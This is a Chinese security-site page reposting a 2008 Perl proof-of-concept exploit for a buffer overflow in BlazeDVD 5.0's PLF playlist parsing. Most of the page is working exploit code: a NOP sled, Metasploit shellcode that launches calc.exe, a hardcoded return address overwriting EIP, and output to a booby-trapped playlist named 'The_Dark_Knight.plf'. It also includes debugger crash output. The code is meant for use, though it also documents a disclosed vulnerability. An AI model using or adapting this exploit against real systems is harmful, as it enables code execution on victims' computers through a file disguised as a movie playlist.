首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit
来源:http://www.zeroscience.org 作者:LiquidWorm 发布时间:2008-08-11  
#!/usr/bin/perl
#
# Title: BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC)
#
# Summary: BlazeDVD is leading powerful and easy-to-use DVD player software.
# It can provide superior video and audio(Dolby) quality, together with other
# enhanced features:e.g. recording DVD,playback image and DV,bookmark and image
# capture.etc.Furthermore, besides DVD,Video CD,Audio CD, BlazeDVD supports DIVX,
# MPEG4, RM, QuickTime, WMV, WMV-HD, MacroMedia Flash and any other video file
# you have the codec installed for.The DVD player software can be extensive
# compatible with hardware,which is operated stable,smoothly under Windows98,
# 98SE, Me, 2000, XP, VISTA.
#
# Product web Page: http://www.blazevideo.com/dvd-player/index.htm
#
# Desc: BlazeDVD 5.0 suffers from buffer overflow vulnerability that can be
# exploited via crafted PLF playlist file localy and remotely. It fails to
# perform boundry checking of the user input file, allowing the EIP to be
# overwritten, thus, controling the next insctruction of the software. After
# succesfull exploitation, calc.exe will be executed. Failed attempts will
# result in Denial Of Service (DoS).
#
# WinDgb(output):
#
#  - (4d8.f80): Access violation - code c0000005 (first chance)
#  - First chance exceptions are reported before any exception handling.
#  - This exception may be expected and handled.
#  - eax=00000001 ebx=77f6c15c ecx=04bd0ba8 edx=00000042 esi=01beffc0 edi=6405565c
#  - eip=41414141 esp=0012f188 ebp=01befcf8 iopl=0         nv up ei pl nz ac pe nc
#  - cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
#  - 41414141 ??              ???
#
#
# Tested on Microsoft Windows XP SP2 (English)
#
# Vulnerability discovered by: Parvez Anwar and Greg Linares
#
# Refs:
#
# - http://secunia.com/advisories/23041/
# - http://www.frsirt.com/english/advisories/2006/4764
# - http://xforce.iss.net/xforce/xfdb/30567
# - http://osvdb.org/30770
# - http://www.securityfocus.com/bid/21337/
# - http://www.milw0rm.com/exploits/2880
#
# Exploit coded by Gjoko 'LiquidWorm' Krstic
#
# liquidworm@gmail.com
#
# http://www.zeroscience.org
#
# 08.08.2008
#

print "\n|==================================================================|\n";
print "|                                                                  |\n";
print "|    BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit |\n";
print "|              by LiquidWorm <liquidworm [at] gmail.com>           |\n";
print "|                                                                  |\n";
print "|==================================================================|\n\n";

$nop = "\x90" x 96;


# win32_exec EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com

$shellcode = "\x29\xc9\x83\xe9\xdd\xd9\xee".
     "\xd9\x74\x24\xf4\x5b\x81\x73".
     "\x13\x7d\xe6\xe7\x4e\x83\xeb".
     "\xfc\xe2\xf4\x81\x0e\xa3\x4e".
     "\x7d\xe6\x6c\x0b\x41\x6d\x9b".
     "\x4b\x05\xe7\x08\xc5\x32\xfe".
     "\x6c\x11\x5d\xe7\x0c\x07\xf6".
     "\xd2\x6c\x4f\x93\xd7\x27\xd7".
     "\xd1\x62\x27\x3a\x7a\x27\x2d".
     "\x43\x7c\x24\x0c\xba\x46\xb2".
     "\xc3\x4a\x08\x03\x6c\x11\x59".
     "\xe7\x0c\x28\xf6\xea\xac\xc5".
     "\x22\xfa\xe6\xa5\xf6\xfa\x6c".
     "\x4f\x96\x6f\xbb\x6a\x79\x25".
     "\xd6\x8e\x19\x6d\xa7\x7e\xf8".
     "\x26\x9f\x42\xf6\xa6\xeb\xc5".
     "\x0d\xfa\x4a\xc5\x15\xee\x0c".
     "\x47\xf6\x66\x57\x4e\x7d\xe6".
     "\x6c\x26\x41\xb9\xd6\xb8\x1d".
     "\xb0\x6e\xb6\xfe\x26\x9c\x1e".
     "\x15\x16\x6d\x4a\x22\x8e\x7f".
     "\xb0\xf7\xe8\xb0\xb1\x9a\x85".
     "\x86\x22\x1e\xc8\x82\x36\x18".
     "\xe6\xe7\x4e";


$ret = "\x78\x53\xbe\x01";

$payload = $nop.$shellcode.$ret;

open(plf, ">./The_Dark_Knight.plf");

print plf "$payload";

print "\n--> Playlist: The_Dark_Knight.plf succesfully created...Enjoy!\n\n";

print "\n...t00t w00t!\n\a\n";


# August, 2008

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Download Accelerator Plus - DA
·Sun xVM VirtualBox < 1.6.4 Pri
·Discuz! 6.0.1 (searchid) Remot
·Cisco WebEx Meeting Manager (a
·LoveCMS 1.6.2 Final Update Set
·Quicksilver Forums 1.4.1 forum
·LoveCMS 1.6.2 Final Remote Cod
·IntelliTamper 2.07 HTTP Header
·IntelliTamper 2.07/2.08 Beta 4
·Joomla Component EZ Store Remo
·>FlashGet 1.9 (FTP PWD Respons
·TGS CMS 0.3.2r2 Remote Code Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved